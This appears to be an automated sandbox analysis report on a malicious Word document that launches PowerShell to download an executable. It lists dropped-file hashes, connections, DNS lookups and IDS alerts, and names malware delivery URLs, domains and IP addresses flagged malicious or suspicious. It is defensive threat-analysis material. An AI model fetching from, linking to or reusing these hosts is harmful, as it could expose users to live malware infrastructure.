C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E3DC2B3.wmf
wmf
MD5:
6b736ab00b45eff5ced357ade435414b
SHA256:
9c2616a49d56606bb4255238d7b3843a58fa3f64376e84a2f611ced275ff8111
1036
powershell.exe
C:\Users\admin\668.exe
html
MD5:
286bd3b8fafd327291ab8e87d61d6602
SHA256:
c94c7d112faa5dc8cc9bbad34016d2ad89b151d3b2458840964a53b7c40e0e84
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2096FCE.wmf
wmf
MD5:
8c2971c5752f87d26149aaa4bd1fbfce
SHA256:
cb9f2ce8e972cfd0f74bc049b357a949db8d7c84283ffd27180739145012a7fc
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\191180C1.wmf
wmf
MD5:
73f49607820ea70427358ea3a7ff7d8a
SHA256:
c5435195784f96a63c79b3d4a6cda6ac40ccf5ff635baaecb06f4d168420df55
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76BA13C0.wmf
wmf
MD5:
c9900b5f89cba024b5e43a09b8342349
SHA256:
aaece3cb409041e1882fc229f41c710196e2b45491755de37009002f7790489b
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
tlb
MD5:
8107bf0b5d526fe92ecb2aa7e1187d69
SHA256:
fb16ab127b476ad108b216292cc50d290ed2f6ab306fe574ed84e935b2881abc
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$2154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3.doc
pgc
MD5:
69a6837bbce1ae0f7a8549245e1a6cd7
SHA256:
f20829549d41f58b79c4d716ca7f9c9029b50031de337fba7942305bc713f5ae
688
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5:
ef1786e22564e3ba799a22f288cae1d9
SHA256:
69e20f6dc7b121a2cca100df9437a843ac1609886cc56800ed133183ba2ac889
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRDEF5.tmp.cvr
––
MD5:
––
SHA256:
––
Network activity
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
8
Threats
7
HTTP requests
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 1036 | powershell.exe | GET | 200 | 43.255.154.32:80 | http://idealnewhomes.com/seite_3/p3jk6ul0y-aad1w-57768077/ | SG |
html
|
|
malicious |
Connections
| PID | Process | IP | ASN | CN | Reputation |
|---|---|---|---|---|---|
| 1036 | powershell.exe | 104.168.157.96:80 | Hostwinds LLC. | US | suspicious |
| 1036 | powershell.exe | 145.14.144.24:443 | Hostinger International Limited | US | shared |
| 1036 | powershell.exe | 145.14.145.210:443 | Hostinger International Limited | US | shared |
| 1036 | powershell.exe | 145.14.144.244:443 | Hostinger International Limited | US | shared |
| 1036 | powershell.exe | 43.255.154.32:80 | GoDaddy.com, LLC | SG | malicious |
DNS requests
| Domain | IP | Reputation |
|---|---|---|
| all.ugmuzik.com | 104.168.157.96
|
suspicious |
| dns.msftncsi.com | 131.107.255.255
|
whitelisted |
| awal122182.000webhostapp.com | 145.14.144.24
|
shared |
| zylokk.000webhostapp.com | 145.14.145.210
|
shared |
| racingturtlesg07.000webhostapp.com | 145.14.144.244
|
shared |
| idealnewhomes.com | 43.255.154.32
|
malicious |
Threats
| PID | Process | Class | Message |
|---|---|---|---|
| –– | –– | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
| 1036 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
| –– | –– | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
| –– | –– | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
| 1036 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
| –– | –– | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
| 1036 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
Debug output strings
No debug info.